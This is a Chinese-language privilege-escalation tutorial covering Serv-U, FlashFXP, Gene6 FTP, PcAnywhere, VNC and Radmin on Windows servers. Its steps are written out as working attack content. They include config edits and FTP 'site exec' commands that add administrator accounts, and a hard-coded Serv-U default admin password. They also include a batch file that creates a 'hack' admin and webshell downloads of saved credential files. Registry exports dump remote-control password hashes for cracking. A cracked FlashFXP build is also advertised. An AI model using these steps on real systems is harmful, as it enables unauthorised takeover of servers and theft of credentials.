[第三方軟件 Serv-u提權(quán)]

Serv-U FTP Server，是一種被廣泛運(yùn)用的FTP服務(wù)器端軟件，支持3x/9x/ME/NT/2K等全Windows系列。可以設(shè)定多個(gè)FTP服務(wù)器、限定登錄用戶的權(quán)限、登錄主目錄及空間大小等

Serv-U提權(quán)分兩種

1.有修改權(quán)限

2.無權(quán)限修改

第一種情況時(shí)

0.判斷是否安裝serv-u

serv-u的默認(rèn)端口是43958 可以用nmap 掃描確認(rèn)

1.檢查是否有可寫權(quán)限

1、通過修改配置文件提權(quán)

首先找配置文件
一般安裝目錄 c:\Program Files\Serv-u\SerUDaemon.ini

修改配置文件，最后提交，成功添加一個(gè)新用戶，有權(quán)限的系統(tǒng)管理員
復(fù)制一個(gè) 修改名字
password 密碼格式 是 gw+md5 我從https://www.cmd5.com/ 把gw123456 加密 注意gw是他的 屬于密碼規(guī)則
把加密完的密碼去替換復(fù)制的密碼 password=gw+md5(gw123456)
maintenance=system 是代表系統(tǒng)權(quán)限 user=你命名的用戶

找到安裝目錄，將文件添加一個(gè)有修改權(quán)限

成功添加系統(tǒng)管理員

image

密碼用cmd5解密，=后面兩位不用管，直接解密后面就ok

image

成功添加用戶后，我們可以通過工具FlashFXP進(jìn)行連接

image

也可以用cmd.exe連接

image

cmd訪問 ftp 連接 ip 輸入你剛剛添加的用戶密碼

輸入

quote site exec net user username password /add

quote site exec net localgroup administrators username /add  

利用ftp命令quote site exec 添加用戶 加入administrators 權(quán)限組

打開3389連接

第二種情況無修改權(quán)限

1.利用md5 直接去解密（ini 文件密碼在ftp連）

2.默認(rèn)密碼，默認(rèn)用戶

image

賬戶：LocalAdministrator ，密碼：#l@$ak#.lk;0@P

命令cmd /c net user DisKill /add & net localgroup administrators DisKill /add

添加了一個(gè)隱藏用戶查看方法net user tls$

3.不是默認(rèn)密碼時(shí) 直接把SerUAdmin.exe 下載下來 進(jìn)行查看密碼

image

image

記住這里選an字符串

image

. 后面就是密碼 把它替換到

image

這也叫溢出提權(quán)

FlashFXP 替換文件漏洞提權(quán)

0x01 前言

介紹

FlashFXP是一個(gè)功能強(qiáng)大的 FXP/FTP 軟件，融合了一些其他優(yōu)秀 FTP軟件的優(yōu)點(diǎn)，如像 CuteFTP 一樣可以比較文件夾，支持彩色文字顯示；像 BpFTP 支持多文件夾選擇文件，能夠緩存文件夾；像 LeapFTP 一樣的外觀界面，甚至設(shè)計(jì)思路也差相仿佛。支持上傳、下載及第三方文件續(xù)傳；可以跳過指定的文件類型，只傳送 需要的文件；可以自定義不同文件類型的顯示顏色；可以緩存遠(yuǎn)端文件夾列表，支持FTP代理及 Socks 3&4；具有避免空閑功能，防止被站點(diǎn)踢出

用途

FlashFXP可用于：

                       ? 發(fā)布和維護(hù)你的網(wǎng)站。
                       ? 上傳和下載文件，照片，視頻，音樂和更多！
                       ? 本地和遠(yuǎn)程文件傳輸或備份。
                       ? 共享您的文件與您的朋友和同事使用功能強(qiáng)大的站點(diǎn)管理器。
                       ? 我們強(qiáng)大的傳輸調(diào)度安排和自動(dòng)化文件傳輸。

特點(diǎn)

1） 基于官方便攜安裝版破解打包，去后續(xù)檢測更新提示

2） 集成密鑰文件，啟動(dòng)即為已授權(quán)版

3） 禁止聯(lián)網(wǎng)驗(yàn)證注冊信息，后續(xù)不反彈

4） 補(bǔ)充漢化翻譯了官方簡體中文語言，默認(rèn)啟動(dòng)為中文，刪多語言、幫助文檔 4.x

**FlashFXP 中的“FXP” 是什么意思? **

 FXP是指在兩臺服務(wù)之間的直線傳輸。也可以稱為“站到站傳輸”(Site to Site Transfers)。

 **注：**FXP過程需要服務(wù)兩臺服務(wù)器均支持方可進(jìn)行。它利用服務(wù)器之間的高速連接，實(shí)現(xiàn)文件的高效傳輸，幾乎不會占用本機(jī)的帶寬資源。

FlashFXP 的不足?

  FlashFXP 無法像CuteFTP那樣實(shí)現(xiàn)的多窗功能，CuteFTP 可在一個(gè)窗口中打開多個(gè)站點(diǎn)。此外，F(xiàn)lashFXP 尚不支持多進(jìn)程傳輸，所有的下載和上傳任務(wù)均是以單線程進(jìn)行。

0x02 環(huán)境配置

操作系統(tǒng)：windows 2003 企業(yè)版

FTP服務(wù)：使用serv-u服務(wù)器，常規(guī)提權(quán)方法均失效

權(quán)限情況：其他常規(guī)方法都無法提權(quán)

使用工具：ASP、. NET版本Shell一個(gè)

0x03 FlashFXP 提權(quán)思維導(dǎo)圖

提權(quán)思路：利用FlashFXP替換文件漏洞，可以讀取管理員鏈接過的站點(diǎn)賬號密碼。

思路擴(kuò)展：通過社會工程學(xué)猜測其他的密碼同樣如此,借此機(jī)會擴(kuò)大權(quán)限

image

0x04 操作演示

**1. **首先獲取WebShell，我們可以利用大馬或菜刀，將quick.dat下載下來（因?yàn)殒溄拥馁~號密碼都保存在quick.dat這個(gè)文件中）

注：falshfxp默認(rèn)安裝目錄：C:\Program Files\flashfxp

image

**2. **接下來打開我們拿到的webshell,下載quick.dat這個(gè)文件，下載后，打開我們本機(jī)的FlashFTP把原先的文件提換掉，打開本機(jī)軟件，查看歷史記錄，可以看到受害者主機(jī)quick.dat 文件里的服務(wù)器、用戶名、密碼等信息，如果想要獲取密碼，可下載星號密碼查看工具查看暗文。

  **星號密碼查看工具地址：**[https://www.arpun.com/soft/8153.html](https://www.arpun.com/soft/8153.html)

  參考鏈接：

                 [http://m.mamicode.com/info-detail-1385885.html](http://m.mamicode.com/info-detail-1385885.html)

                 [https://www.docin.com/p-434258776.html](https://www.docin.com/p-434258776.html)

Gene6 FTP提權(quán)

Gene6 FTP Server這個(gè)FTP軟件簡略易用,比SU的保險(xiǎn)性高的多.
他的默認(rèn)管理端口是8021,只容許本機(jī)盤算機(jī)連接.外部計(jì)算機(jī)即便你得到管理帳,你也不能登陸進(jìn)去.
這一點(diǎn)和我們的SU一樣,SU的管理端口是43958.
Gene6 FTP Server的帳戶配置文件在:C:\Program Files\Gene6 FTP Server\RemoteAdmin\Remote.ini;在配置文件中找到md5加密的密碼

那么我們只能通過webshell上傳lcx.exe 把端口轉(zhuǎn)發(fā)，如：lcx.exe –tran 600 127.0.0.1 8021 接通過另外一臺機(jī)器安裝一個(gè)gene6遠(yuǎn)程連接600端口創(chuàng)建一個(gè)域再創(chuàng)建一個(gè)有權(quán)限的帳號,注意Gene6可單獨(dú)定義SITE命令調(diào)用執(zhí)行文件文件可以通過webshell上傳
上傳為這樣還不能提權(quán).這里到了我們最核心的一步.
1.寫一個(gè)能執(zhí)行命令的批處理文件,并上傳到目標(biāo)主機(jī).
@echo off
net user hack hack /add
net localgroup administrators hack /add
2.然后在SITE COMMANDS那個(gè)地方再進(jìn)行配置.
COMMAND那輸入你的命令執(zhí)行的名字.我寫的是HACK DESCRIPTTION這個(gè)是寫描述的.這里隨便你寫什么都可以的.
EXECUTE這里輸入你的BAT的命令執(zhí)行文件的路徑.也就是你剛上傳的那個(gè)文件的路徑.點(diǎn)OK就可以了.現(xiàn)在我們來看下我們本地的帳號情況.
只有兩個(gè)帳號.
現(xiàn)在我們登陸FTP進(jìn)行提權(quán)操作.輸入提權(quán)命令 .

quote site hack

200 Command executed 命令成功執(zhí)我們來看下加上帳號沒有.
已經(jīng)多了一個(gè)HACK的帳號,權(quán)限為管理權(quán)限.提升權(quán)限已經(jīng)成功.，通過quote site exec 執(zhí)行就行

PCanyWhere提權(quán)

PCAnyWhere簡介

PcAnyWhere是一款遠(yuǎn)程控制軟件，它出現(xiàn)的目的是為了方便網(wǎng)管人員管理服務(wù)器。安裝之后默認(rèn)監(jiān)聽5631端口。它可以將電腦當(dāng)成主控端去控制遠(yuǎn)方的另外一臺同樣安裝有PcAnyWhere的電腦（被控端），實(shí)現(xiàn)互傳文件，內(nèi)建FIPS 140-2驗(yàn)證AES 256位元加密，可以確保階段作業(yè)的安全性。

提權(quán)原理

PcAnyWhere提權(quán)的原理是PcAnyWhere在建立被控端后，會在服務(wù)器上產(chǎn)生一個(gè)配置文件“pca.***.cif”，這個(gè)文件所在的目錄并非在安裝目錄中，而是在“C:\Document and Settings\All Users\Application Data\Symantec\pcAnywhere\Hosts”中。

在配置文件中保存著加密后的鏈接賬戶信息，當(dāng)攻擊者下載到這個(gè)文件之后，就可以對這個(gè)文件進(jìn)行解密，之后即可獲得用戶名與密碼，之后再使用本地的PcAnyWhere進(jìn)行登錄鏈接即可獲得遠(yuǎn)程控制。

提權(quán)操作演示

環(huán)境部署

首先下載PcAnyWhere到本地，之后分別在靶機(jī)（Windows Server 2003 R2）、攻擊主機(jī)Windows XP 中進(jìn)行安裝，之后再Windows Server 2003 R2中建立被控制端程序，設(shè)置用戶名：hps 密碼：*************,之后我們可以發(fā)現(xiàn)在“C:\Document and Settings\All Users\Application Data\Symantec\pcAnywhere\Hosts”中

存在一個(gè)用于記錄該用戶的文件：

image

我們最終的目的就是通過在Windows Server 2003 R2上的WEBshell來下載該文件到攻擊主機(jī)上，之后再進(jìn)行破解，最后再使用攻擊主機(jī)上的PcAnyWhere進(jìn)行連接！下面進(jìn)行具體操作！

在Windows XP中使用菜刀連接一句話木馬

image

之后進(jìn)入C:\Document and Settings\All Users\Application Data\Symantec\pcAnywhere\Hosts\下，下載文件

image

之后可以使用明小子、通天門來對該文件進(jìn)行解密，獲得最后的用戶名與密碼，之后在本地創(chuàng)建PcAnyWhere的控制端進(jìn)行連接即可！

image

image

實(shí)現(xiàn)遠(yuǎn)控，提權(quán)！

image

VNC提權(quán)

VNC(Virtual Network Computing，虛擬網(wǎng)絡(luò)計(jì)算）是一套由英國劍橋大學(xué)AT&T實(shí)驗(yàn)
室在2002年開發(fā)的輕量型跨平臺遠(yuǎn)程
控制計(jì)算機(jī)軟件
“vnc的默認(rèn)端口是5901使用端口掃描如果有便安裝了vnc

我們在實(shí)驗(yàn)時(shí)安裝服務(wù)端就可

我們可以通過腳本大馬讀注冊表獲取密碼如果不行利用菜刀上傳一個(gè)cmd.exe到有讀寫權(quán)限的目錄然后setp c:\路徑...\cmd.exe #切換至上傳的cmd來執(zhí)行命令

Cmd/c"regedit/ec:\123.reg"HKEY_LOCAL_MACHINE\software\RealVNC\WinVNC4" "

獲取的密碼
將得出的十進(jìn)制數(shù)去掉第一個(gè)數(shù)其他轉(zhuǎn)換成16進(jìn)制
破解16進(jìn)制數(shù)得到密碼
vncx.exe -W 回車
輸入16進(jìn)制數(shù)
連接vnc
讀取

image

image

image

vncx4.exe -w 8個(gè)數(shù) 自動(dòng)破解密碼

然后使用我們vnc工具連接

Radmin提權(quán)

一款遠(yuǎn)控工具

端口掃描 4899 端口

上傳 radmin.asp 木馬讀取 radmin的加密密文

下載radmin工具連接
或者
Radmin安裝方法直接把server.exe 和admdll.dll放在vm里面，cmd下運(yùn)行server.exe /setup 設(shè)置密碼及輸入注冊信息就ok了；安裝完之后可以通過C:>cmd /c "regedit /e c:\123.reg "HKEY_LOCAL_MACHINE\system\RAdmin\v2.0\Server
Parameters""導(dǎo)出hash值，再通過hash版Radmin連接就可以

cmd/c"regedit/ed:\IFEO.reg"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"" 
cmd/c"regedit/ed:\123.reg"HKEY_LOCAL_MACHINE\system\RAdmin\v2.0\Server\Parameters""